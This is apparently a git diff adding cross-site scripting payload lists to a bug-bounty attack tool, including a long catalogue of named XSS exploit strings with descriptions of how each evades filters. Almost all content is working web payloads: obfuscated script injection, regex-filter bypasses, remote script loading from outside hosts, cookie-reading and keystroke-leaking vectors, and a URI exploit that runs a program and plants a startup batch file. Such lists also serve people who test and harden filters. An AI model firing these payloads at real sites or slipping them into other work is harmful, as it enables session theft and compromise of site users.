style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div> +<svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler></svg> +<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg> +<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe> +<div id=d><x xmlns="><iframe onload=alert(97)"></div><script>d.innerHTML+='';</script><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script> +<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script> +XXX<style>*{color:gre/**/en !/**/important}*{color:red}*{background:url(xx:x //**/\red/*)}</style> +<img[a][b]src=x[d]onerror[c]=[e]"alert(100)"> +<a href="[a]java[b]script[c]:alert(101)">XXX</a> +<img src="x` `<script>alert(102)</script>"` `> +<script>history.pushState(0,0,'/i/am/somewhere_else');</script> +<svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg> +<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe> +<img src onerror /" '"= alt=alert(106)//"> +<title onpropertychange=alert(107)></title><title title=></title> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>"><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//"> +<svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg> +<svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg> +<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div> +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div> +<div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style> +<x style="background:url('x[a];color:red;/*')">XXX</x> +<!--[if]><script>alert(115)</script --><!--[if<img src=x onerror=alert(2)//]> --> +<div id="x">x</div><xml:namespace prefix="t"><import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;"> +<a href="http://attacker.org"><iframe src="http://example.org/"></iframe></a> +<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"><h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe> +<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe><textarea type="text" cols="50" rows="10"></textarea> +<script>function makePopups(){for (i=1;i<6;i++){window.open('popup.html','spam'+i,'width=50,height=50');}}</script><body><a href="#" onclick="makePopups()">Spam</a> +<html xmlns="http://www.w3.org/1999/xhtml"xmlns:svg="http://www.w3.org/2000/svg"><body style="background:gray"><iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/><svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"><svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/><svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body></html> +<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe> +<span class=foo>Some text</span><a class=bar href="http://www.example.org">www.example.org</a><script src="http://code.jquery.com/jquery-1.4.4.js"></script><script>$("span.foo").click(function(){alert('foo');$("a.bar").click();});$("a.bar").click(function(){alert('bar');location="http://html5sec.org";});</script></div><script src="/\example.com\foo.js"></script><script src="\\example.com\foo.js"></script></div><?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id ID #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg"><xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe></xsl:template></xsl:stylesheet><circle fill="red" r="40"></circle></svg> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object><object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object> +<svg xmlns="http://www.w3.org/2000/svg" id="x"><listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/><handler id="y">alert(127)</handler></svg> +<svg><style>&lt;img/src=x onerror=alert(128)// </b> +<svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'></svg> +<math href="javascript:alert(130)">CLICKME</math><math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math> +<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);<br/><hr/>feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div> +<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" type="password"></form><!-- injection --><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /></image></svg> +<!-- `<img/src=xx:xx onerror=alert(133)//--!> +<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(134)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style> +<?xml-stylesheet type="text/xsl" href="#" ?><stylesheet xmlns="http://www.w3.org/TR/WD-xsl"><template match="/"><eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval><if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if></template></stylesheet> +<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form> +<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="400"></circle><animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" /></a> +<link rel="import" href="test.svg" /> +<iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" /> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-With-Context-Jhaddix.txt b/bounty_drive/attacks/xss/payloads/XSS-With-Context-Jhaddix.txt new file mode 100644 index 0000000..691712a --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-With-Context-Jhaddix.txt @@ -0,0 +1,1617 @@ +A very short cross browser header injection +Exploit Name: A very short cross browser header injection +Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws' +Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area. +Exploit Tags: xss, short, header, injection +Author Name: .mario + +Add onclick event hadler +Exploit Name: Add onclick event hadler +Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); +Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert. +Exploit Tags: general, JS breaking, basic, obfuscated, user interaction +Author Name: kishor + +Advanced HTML injection locator +Exploit Name: Advanced HTML injection locator +Exploit String: <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e +Exploit Description: This vector indicates HTML injections by stroked text. +Exploit Tags: general, html breaking, injection +Author Name: .mario + +Advanced XSS Locator +Exploit Name: Advanced XSS Locator +Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){// +Exploit Description: Advanced XSS Locator +Exploit Tags: general, html breaking, comment breaking, JS breaking +Author Name: .mario + +Advanced XSS Locator for title-Injections +Exploit Name: Advanced XSS Locator for title-Injections +Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");} +Exploit Description: This is a modified version of the XSS Locator from ha.ckers.org especially crafted to check for title injections. +Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking +Author Name: .mario + +aim: uri exploit +Exploit Name: aim: uri exploit +Exploit String: aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" +Exploit Description: This aim-uri executes the calc.exe on vulnerable systems +Exploit Tags: URI exploits, gecko, injection, general +Author Name: xs-sniper + +Backslash-obfuscated XBL injection - variant 1 +Exploit Name: Backslash-obfuscated XBL injection - variant 1 +Exploit String: <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. +Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +Backslash-obfuscated XBL injection - variant 2 +Exploit Name: Backslash-obfuscated XBL injection - variant 2 +Exploit String: <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45& +#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:& +#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105& +#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46& +#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115 +&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92 +&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities. +Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +Backslash-obfuscated XBL injection - variant 3 +Exploit Name: Backslash-obfuscated XBL injection - variant 3 +Exploit String: <Q%^&*(£@!’” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags. +Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +Backslash-obfuscated XBL injection - variant 4 +Exploit Name: Backslash-obfuscated XBL injection - variant 4 +Exploit String: <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Furthermore unclosed NBSP entities are used to obfuscate the string. +Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +Backslash-obfuscated XBL injection - variant 5 +Exploit Name: Backslash-obfuscated XBL injection - variant 5 +Exploit String: <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Between any character of the original payload null bytes are used to obfuscate. +Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +BASE +Exploit Name: BASE +Exploit String: <BASE HREF="javascript:alert('XSS');//"> +Exploit Description: Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like ”images/image.jpg” rather than full paths. If the path includes a leading forward slash like ”/images/image.jpg” you can remove one slash from this vector (as long as there are two to begin the comment this will work +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Basic back ticked attribute breaker +Exploit Name: Basic back ticked attribute breaker +Exploit String: `> <script>alert(5)</script> +Exploit Description: This vector breaks back ticked attributes. +Exploit Tags: general, html breaking, basic +Author Name: kishor + +Basic double quoted attribute breaker +Exploit Name: Basic double quoted attribute breaker +Exploit String: > <script>alert(4)</script> +Exploit Description: This vector breaks double quoted attributes and produces an alert. +Exploit Tags: general, html breaking +Author Name: kishor + +Basic JS breaker +Exploit Name: Basic JS breaker +Exploit String: xyz onerror=alert(6); +Exploit Description: This vector just fits between script tags and fires an alerts. +Exploit Tags: general, JS breaking, basic +Author Name: kishor + +Basic JS breaker variant 1 +Exploit Name: Basic JS breaker variant 1 +Exploit String: 1;a=eval;b=alert;a(b(/c/.source)); +Exploit Description: This vector breaks JS integer assignments. +Exploit Tags: general, JS breaking, basic, obfuscated +Author Name: kishor + +Basic JS breaker variant 2 +Exploit Name: Basic JS breaker variant 2 +Exploit String: 1];a=eval;b=alert;a(b(17));// +Exploit Description: This vector breaks JS integer assignments in arrays. +Exploit Tags: general, JS breaking, basic, obfuscated +Author Name: kishor + +Basic JS breaker variant 3 +Exploit Name: Basic JS breaker variant 3 +Exploit String: ];a=eval;b=alert;a(b(16));// +Exploit Description: This vector breaks JS when placed in double quoted arrays. +Exploit Tags: general, JS breaking +Author Name: kishor + +Basic JS breaker variant 4 +Exploit Name: Basic JS breaker variant 4 +Exploit String: '];a=eval;b=alert;a(b(15));// +Exploit Description: This vector breaks JS when embedded in single quoted arrays. +Exploit Tags: general, JS breaking, basic, obfuscated +Author Name: kishor + +Basic JS breaker variant 5 +Exploit Name: Basic JS breaker variant 5 +Exploit String: 1};a=eval;b=alert;a(b(14));// +Exploit Description: JS literal object breaker for integer properties. +Exploit Tags: general, JS breaking, basic, obfuscated +Author Name: kishor + +Basic JS breaker variant 6 +Exploit Name: Basic JS breaker variant 6 +Exploit String: '};a=eval;b=alert;a(b(13));// +Exploit Description: JS breaker for literal objects with single quoted string properties. +Exploit Tags: general, JS breaking, basic, obfuscated +Author Name: kishor + +Basic JS breaker variant 7 +Exploit Name: Basic JS breaker variant 7 +Exploit String: };a=eval;b=alert;a(b(12));// +Exploit Description: JS breaker for literal objects with double quoted string properties. +Exploit Tags: general, JS breaking +Author Name: kishor + +Basic JS breaker variant 8 +Exploit Name: Basic JS breaker variant 8 +Exploit String: a=1;a=eval;b=alert;a(b(11));// +Exploit Description: Can be used when JS can be injected directly. +Exploit Tags: general, JS breaking, basic, obfuscated +Author Name: kishor + +Basic JS breaker variant 9 +Exploit Name: Basic JS breaker variant 9 +Exploit String: ;//%0da=eval;b=alert;a(b(10));// +Exploit Description: Breaks double quoted strings, injects a comment, carriage return and finally an alert. +Exploit Tags: general, JS breaking, CRLF +Author Name: kishor + +Basic JS breaker variant 10 +Exploit Name: Basic JS breaker variant 10 +Exploit String: ';//%0da=eval;b=alert;a(b(9));// +Exploit Description: Breaks single quoted strings, injects a comment, carriage return and finally an alert. +Exploit Tags: general, JS breaking, basic, obfuscated, CRLF +Author Name: kishor + +Basic single quoted attribute breaker +Exploit Name: Basic single quoted attribute breaker +Exploit String: '> <script>alert(3)</script> +Exploit Description: This vector breaks single quoted attributes and appends an alert. +Exploit Tags: general, html breaking, basic +Author Name: kishor + +Basic title breaker +Exploit Name: Basic title breaker +Exploit String: </title><script>alert(1)</script> +Exploit Description: This basic vector breaks HTML titles and injects JavaScript. +Exploit Tags: general, html breaking, basic, title breaking +Author Name: kishor + +BGSOUND +Exploit Name: BGSOUND +Exploit String: <BGSOUND SRC="javascript:alert('XSS');"> +Exploit Description: BGSOUND +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +BODY background-image +Exploit Name: BODY background-image +Exploit String: <BODY BACKGROUND="javascript:alert('XSS');"> +Exploit Description: BODY image +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +BODY ONLOAD +Exploit Name: BODY ONLOAD +Exploit String: <BODY ONLOAD=alert('XSS')> +Exploit Description: BODY tag (I like this method because it doesn't require using any variants of ”javascript:” or ”<SCRIPT...” to accomplish the XSS attack) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Camouflaged comment injection with JS link +Exploit Name: Camouflaged comment injection with JS link +Exploit String: <!-- +<A href=" +- --><a href=javascript:alert:document.domain +>test--> +Exploit Description: This vector evades filters by camouflaging as a comment and inhabiting a JS link. +Exploit Tags: general, obfuscated, comment breaking, internet explorer +Author Name: thespanner.co.uk + +Case Insensitive +Exploit Name: Case Insensitive +Exploit String: <IMG SRC=JaVaScRiPt:alert('XSS')> +Exploit Description: Case insensitive XSS attack vector. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Character Encoding Example +Exploit Name: Character Encoding Example +Exploit String: <%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C +Exploit Description: All of the possible combinations of the character ”<” in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Closing JS Tag in JS String assignment +Exploit Name: Closing JS Tag in JS String assignment +Exploit String: <script> +var a = "</script> <script> alert('XSS !'); </script> <script>"; +</script> + +Exploit Description: For some reason, Firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code. +Exploit Tags: general, gecko, obfuscated, evil tags +Author Name: t3rmin4t0r + +Commented-out Block +Exploit Name: Commented-out Block +Exploit String: <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> +Exploit Description: Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job. +Exploit Tags: general, obfuscated, conditional comments, internet explorer +Author Name: ha.ckers.org + +Comment-breaker using obfuscated JavaScript +Exploit Name: Comment-breaker using obfuscated JavaScript +Exploit String: */a=eval;b=alert;a(b(/e/.source));/* +Exploit Description: This vector creates an alert by breaking multiline comments. +Exploit Tags: general, comment breaking, JS breaking +Author Name: kishor + +Conditional style injection for IE +Exploit Name: Conditional style injection for IE +Exploit String: width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) +Exploit Description: This vector uses JavaScript conditional statements to inject an alert into CSS properties - it was once used as a PoC for a vulnerability in Stefan Di Paolos data binding example. +Exploit Tags: general, obfuscated, internet explorer, style injection +Author Name: DoctorDan + +Content Replace +Exploit Name: Content Replace +Exploit String: <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> +Exploit Description: Content replace as an attack vector (assuming ”http://www.google.com/” is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (”java&#x26;#x09;script:” was converted into ”java&#x09;script:”. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Cookie Manipulation +Exploit Name: Cookie Manipulation +Exploit String: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> +Exploit Description: Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc). +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +DIV background-image 1 +Exploit Name: DIV background-image 1 +Exploit String: <DIV STYLE="background-image: url(javascript:alert('XSS'))"> +Exploit Description: Div background-image +Exploit Tags: general, evil tags, style injection +Author Name: ha.ckers.org + +DIV background-image 2 +Exploit Name: DIV background-image 2 +Exploit String: <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +Exploit Description: Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279) +Exploit Tags: general, evil tags, style injection +Author Name: ha.ckers.org + +DIV expression +Exploit Name: DIV expression +Exploit String: <DIV STYLE="width: expression(alert('XSS'));"> +Exploit Description: Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and ”expression” +Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +DIV w/Unicode +Exploit Name: DIV w/Unicode +Exploit String: <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +Exploit Description: DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Double open angle brackets +Exploit Name: Double open angle brackets +Exploit String: <IFRAME SRC=http://ha.ckers.org/scriptlet.html < +Exploit Description: This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't +Exploit Tags: general, evil tags, injection, gecko +Author Name: ha.ckers.org + +Dword Encoding +Exploit Name: Dword Encoding +Exploit String: <A HREF="http://1113982867/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Embed Flash +Exploit Name: Embed Flash +Exploit String: <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +Exploit Description: Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=”never” and allownetworking=”internal” it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html : +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Embedded Carriage Return +Exploit Name: Embedded Carriage Return +Exploit String: <IMG SRC="jav&#x0D;ascript:alert('XSS');"> +Exploit Description: Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Embedded Encoded Tab +Exploit Name: Embedded Encoded Tab +Exploit String: <IMG SRC="jav&#x09;ascript:alert('XSS');"> +Exploit Description: Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Embedded Newline +Exploit Name: Embedded Newline +Exploit String: <IMG SRC="jav&#x0A;ascript:alert('XSS');"> +Exploit Description: Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +Embedded Tab +Exploit Name: Embedded Tab +Exploit String: <IMG SRC="javascript:alert('XSS');"> +Exploit Description: Embedded tab to break up the cross site scripting attack. +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +End title tag +Exploit Name: End title tag +Exploit String: </TITLE><SCRIPT>alert("XSS");</SCRIPT> +Exploit Description: This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack. +Exploit Tags: general, title breaking +Author Name: ha.ckers.org + +Escaping JavaScript escapes +Exploit Name: Escaping JavaScript escapes +Exploit String: \";alert('XSS');// +Exploit Description: Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a=”$ENV{QUERY_STRING}”;</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a=””;alert('XSS');//”;</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. +Exploit Tags: general, JS breaking +Author Name: ha.ckers.org + +Evade Regex Filter 1 +Exploit Name: Evade Regex Filter 1 +Exploit String: <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: For performing XSS on sites that allow ”<SCRIPT>” but don't allow ”<SCRIPT SRC...” by way of the following regex filter: /<script[^>]+src/i +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Evade Regex Filter 2 +Exploit Name: Evade Regex Filter 2 +Exploit String: <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: For performing XSS on sites that allow ”<SCRIPT>” but don't allow ”<SCRIPT SRC...” by way of a regex filter: /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?'|[^'”>\s]+))?)+\s*|\s*)src/i this is an important one, because I've seen this regex in the wild) +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Evade Regex Filter 3 +Exploit Name: Evade Regex Filter 3 +Exploit String: <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: Another XSS to evade this regex filter: /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?'|[^'”>\s]+))?)+\s*|\s*)src/i +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Evade Regex Filter 4 +Exploit Name: Evade Regex Filter 4 +Exploit String: <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: Yet another XSS to evade the same filter: /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?'|[^'”>\s]+))?)+\s*|\s*)src/i +The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags) +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Evade Regex Filter 5 +Exploit Name: Evade Regex Filter 5 +Exploit String: <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: And one last XSS attack (using grave accents) to evade this regex: /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?'|[^'”>\s]+))?)+\s*|\s*)src/i +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Eval string contained in name property +Exploit Name: Eval string contained in name property +Exploit String: eval(name) +Exploit Description: This very simple but effective vector uses the eval method on the name property. +Exploit Tags: general, super short, self contained +Author Name: SIrDarckCat + +Extra dot for Absolute DNS +Exploit Name: Extra dot for Absolute DNS +Exploit String: <A HREF="http://www.google.com./">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Exploit Tags: general, evil tags 